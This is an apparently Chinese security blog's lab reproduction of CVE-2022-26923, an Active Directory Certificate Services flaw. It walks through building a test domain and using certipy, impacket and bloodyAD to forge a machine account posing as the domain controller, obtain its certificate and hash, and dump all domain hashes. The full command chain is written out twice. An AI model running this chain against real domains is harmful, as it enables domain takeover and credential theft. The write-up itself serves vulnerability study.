CVE-2022-26923域权限提升漏洞复现

字数统计: 1.1k字   |   阅读时长≈ 4分

本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA

环境搭建

域控

选择一台winserver2016搭建域控服务,这里是winserver2016。选择Active Directory
域服务,其他默认即可。

在这里插入图片描述

在这里插入图片描述

安装完成之后,提升为域控制器,开始配置域控。

添加新林rangenet.cn,其他默认,然后一步步到安装完成。

在这里插入图片描述

在这里插入图片描述

ADCS搭建

下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。

服务器管理器–>添加角色和功能向导–>勾选服务器角色–>Active Director 证书服务

在这里插入图片描述

在这里插入图片描述

开始安装

在这里插入图片描述

配置ADCS服务,只需要注意下面截图的内容,其他都是默认。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

新建低权限AD用户

创建低权限AD用户Zhangfei:ZFpassword@123

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

工具

https://github.com/SecureAuthCorp/impacket

https://github.com/ly4k/Certipy

https://github.com/CravateRouge/bloodyAD

测试复现

配置 DNS

修改kali的/etc/hosts文件并添加以下条目:

在这里插入图片描述

域内定位CA机器

在域内机器上执行,为了方便这里在域控中执行

certutil -config - -ping

在这里插入图片描述

测试证书生成

首先使用用户证书模板为我们的低权限AD用户 (Username=zhangfei
Password=ZFpassword@123) 生成证书:

certipy req ‘rangenet.cn/zhangfei:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template User

在这里插入图片描述

验证此证书是否有效

certipy auth -pfx zhangfei.pfx

在这里插入图片描述

创建机器账户到域

我们需要向域中添加一台新计算机以生成机器证书。我们不必将物理计算机添加到网络中。我们可以使用Impacket的addcomputer.py脚本让它看起来像我们正在添加一台新计算机:

addcomputer.py ‘rangenet.cn/zhangfei:ZFpassword@123’ -method LDAPS
-computer-name ‘zhangfeiPC’ -computer-pass ‘ZFpassword@123’

在这里插入图片描述

参数说明:

  • Rangenet.cn/zhangfei:ZFpassword@123 有效的 AD 凭据才能添加新计算机。

  • Method 身份验证方法。LDAPS 将与域控制器上的 LDAP 服务交互。

  • computer-name 计算机的名称,可以随便起。

  • computer-pass 与我计算机的机器帐户关联的密码。也可以随便起。

请求机器证书

们创建的新计算机生成一个证书。要使用该计算机的机器帐户,您需要在名称末尾添加一个“$”:

certipy req ‘rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template Machine

在这里插入图片描述

Certipy验证证书是否有效,获取到哈希,证明有效:

certipy auth -pfx zhangfeipc.pfx

在这里插入图片描述

更新 DNS 主机名和 SPN 属性

使用Get-ADCompute命令查看AD对象中DNS主机名和SPN:

在这里插入图片描述

首先删除我们当前的 SPN 属性:

Set-ADComputer zhangfeiPC -ServicePrincipalName @{}

在这里插入图片描述

使用Set-ADComputer cmdlet将DNS主机名属性更新为DC的属性

Set-ADComputer zhangfeiPC -DnsHostName DC.rangenet.cn

在这里插入图片描述

验证是否进行了更改,可以看到已经成功更改DNSHostName为dc.rangenet.cn

在这里插入图片描述

伪造恶意证书

再次运行Certipy的相同命令来重新生成机器证书,可以看到DNS Host
Name已经变成了dc.rangenet.cn:

certipy req ‘rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template Machine

在这里插入图片描述

再次验证证书是否有效,成功获取到哈希:

在这里插入图片描述

转储所有用户哈希

这里使用impacket的secretsdump.py来dump哈希

在这里插入图片描述

攻击复现

配置 DNS

修改kali的/etc/hosts文件并添加以下条目:

在这里插入图片描述

域内定位CA机器

在域内机器上执行,为了方便这里在域控中执行

certutil -config - -ping

在这里插入图片描述

测试证书生成

首先使用用户证书模板为我们的低权限AD用户 (Username=zhangfei
Password=ZFpassword@123) 生成证书:

certipy req ‘rangenet.cn/zhangfei:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template User

在这里插入图片描述

验证此证书是否有效

certipy auth -pfx zhangfei.pfx

在这里插入图片描述

创建机器账户到域

使用bloodyAD工具来创建机器账户。

查看ms-DS-MachineAccountQuota属性,如果ms-DS-MachineAccountQuota>0就可以创建机器帐户

在这里插入图片描述

在LDAP中创建一个机器帐户

在这里插入图片描述

更新机器帐户的DNS HostName

将机器帐户的DNS Host Name改为域控的DC.rangenet.cn

在这里插入图片描述

查看属性,是否成功更改了DNS Host Name

在这里插入图片描述

伪造恶意证书

运行Certipy来重新生成机器证书,可以看到DNS Host Name已经变成了dc.rangenet.cn:

certipy req ‘rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template Machine

在这里插入图片描述

再次验证证书是否有效,成功获取到哈希:

在这里插入图片描述

转储所有用户哈希

这里使用impacket的secretsdump.py来dump哈希

在这里插入图片描述

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。